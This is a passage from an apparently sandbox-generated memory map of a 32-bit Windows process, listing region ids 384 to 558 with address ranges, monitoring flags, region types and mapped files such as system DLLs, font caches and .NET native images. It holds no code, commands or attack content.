end_va = 0x21f3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000021f0000"
filename = ""
Region:
id = 384
start_va = 0x4bd0000
end_va = 0x5bcffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "~fontcache-fontface.dat"
filename = "\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\FontCache\\~FontCache-FontFace.dat" (normalized: "c:\\windows\\serviceprofiles\\localservice\\appdata\\local\\fontcache\\~fontcache-fontface.dat")
Region:
id = 385
start_va = 0x47f0000
end_va = 0x47f3fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000047f0000"
filename = ""
Region:
id = 386
start_va = 0x5bd0000
end_va = 0x5ccffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005bd0000"
filename = ""
Region:
id = 387
start_va = 0x5cd0000
end_va = 0x5dcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005cd0000"
filename = ""
Region:
id = 388
start_va = 0x5dd0000
end_va = 0x62c1fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000005dd0000"
filename = ""
Region:
id = 389
start_va = 0x4af0000
end_va = 0x4bacfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "micross.ttf"
filename = "\\Windows\\Fonts\\micross.ttf" (normalized: "c:\\windows\\fonts\\micross.ttf")
Region:
id = 390
start_va = 0x62d0000
end_va = 0x66cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000062d0000"
filename = ""
Region:
id = 391
start_va = 0x66d0000
end_va = 0x770ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 392
start_va = 0x74eb0000
end_va = 0x762aefff
monitored = 0
entry_point = 0x7506b990
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")
Region:
id = 393
start_va = 0x76800000
end_va = 0x76836fff
monitored = 0
entry_point = 0x76803b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll")
Region:
id = 394
start_va = 0x745b0000
end_va = 0x74aa8fff
monitored = 0
entry_point = 0x747b7610
region_type = mapped_file
name = "windows.storage.dll"
filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll")
Region:
id = 395
start_va = 0x74520000
end_va = 0x745acfff
monitored = 0
entry_point = 0x74569b90
region_type = mapped_file
name = "shcore.dll"
filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll")
Region:
id = 396
start_va = 0x76470000
end_va = 0x764b3fff
monitored = 0
entry_point = 0x76477410
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll")
Region:
id = 397
start_va = 0x73f20000
end_va = 0x73f2efff
monitored = 0
entry_point = 0x73f22e40
region_type = mapped_file
name = "profapi.dll"
filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll")
Region:
id = 398
start_va = 0x4800000
end_va = 0x4800fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004800000"
filename = ""
Region:
id = 399
start_va = 0x4810000
end_va = 0x4810fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 400
start_va = 0x4810000
end_va = 0x4818fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 401
start_va = 0x4810000
end_va = 0x4810fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 402
start_va = 0x4810000
end_va = 0x4818fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 403
start_va = 0x4810000
end_va = 0x4810fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll"
filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll")
Region:
id = 404
start_va = 0x4810000
end_va = 0x4818fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "tzres.dll.mui"
filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui")
Region:
id = 405
start_va = 0x6c3d0000
end_va = 0x6c3dcfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "accessibility.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Accessibility\\84e56c93e3dc8628104aaba0a2604260\\Accessibility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\accessibility\\84e56c93e3dc8628104aaba0a2604260\\accessibility.ni.dll")
Region:
id = 406
start_va = 0x4810000
end_va = 0x4810fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004810000"
filename = ""
Region:
id = 407
start_va = 0x4880000
end_va = 0x48e1fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "mscorrc.dll"
filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll")
Region:
id = 408
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 409
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 410
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 411
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 412
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 413
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 414
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 415
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 416
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 417
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 418
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 419
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 420
start_va = 0x4900000
end_va = 0x490ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 421
start_va = 0x4900000
end_va = 0x490ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 422
start_va = 0x4900000
end_va = 0x490ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 423
start_va = 0x6bca0000
end_va = 0x6c3c0fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "system.core.ni.dll"
filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")
Region:
id = 424
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 425
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 426
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 427
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 428
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 429
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 430
start_va = 0x4900000
end_va = 0x490ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004900000"
filename = ""
Region:
id = 431
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 432
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 433
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 434
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 435
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 436
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 437
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 438
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 439
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 440
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 441
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 442
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 443
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 444
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 445
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 446
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 447
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 448
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 449
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 450
start_va = 0x71200000
end_va = 0x71212fff
monitored = 0
entry_point = 0x71209950
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll")
Region:
id = 451
start_va = 0x70230000
end_va = 0x7025efff
monitored = 0
entry_point = 0x702495e0
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll")
Region:
id = 452
start_va = 0x71560000
end_va = 0x7157afff
monitored = 0
entry_point = 0x71569050
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll")
Region:
id = 453
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 454
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 455
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 456
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 457
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 458
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 459
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 460
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 461
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 462
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 463
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 464
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 465
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 466
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 467
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 468
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 469
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 470
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 471
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 472
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 473
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 474
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 475
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 476
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 477
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 478
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 479
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 480
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 481
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 482
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 483
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 484
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 485
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 486
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 487
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 488
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 489
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 490
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 491
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 492
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 493
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 494
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 495
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 496
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 497
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 498
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 499
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 500
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 501
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 502
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 503
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 504
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 505
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 506
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 507
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 508
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 509
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 510
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 511
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 512
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 513
start_va = 0x48f0000
end_va = 0x48fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000048f0000"
filename = ""
Region:
id = 514
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 515
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 516
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 517
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 518
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 519
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 520
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 521
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 522
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 523
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 524
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 525
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 526
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 527
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 528
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 529
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 530
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 531
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 532
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 533
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 534
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 535
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 536
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 537
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 538
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 539
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 540
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 541
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 542
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 543
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 544
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 545
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 546
start_va = 0x4910000
end_va = 0x491ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004910000"
filename = ""
Region:
id = 547
start_va = 0x4910000
end_va = 0x4914fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000004910000"
filename = ""
Region:
id = 548
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 549
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 550
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 551
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 552
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 553
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 554
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 555
start_va = 0x4930000
end_va = 0x493ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 556
start_va = 0x4930000
end_va = 0x496ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004930000"
filename = ""
Region:
id = 557
start_va = 0x4970000
end_va = 0x49affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004970000"
filename = ""
Region:
id = 558
start_va = 0x7710000
end_va = 0x780ffff
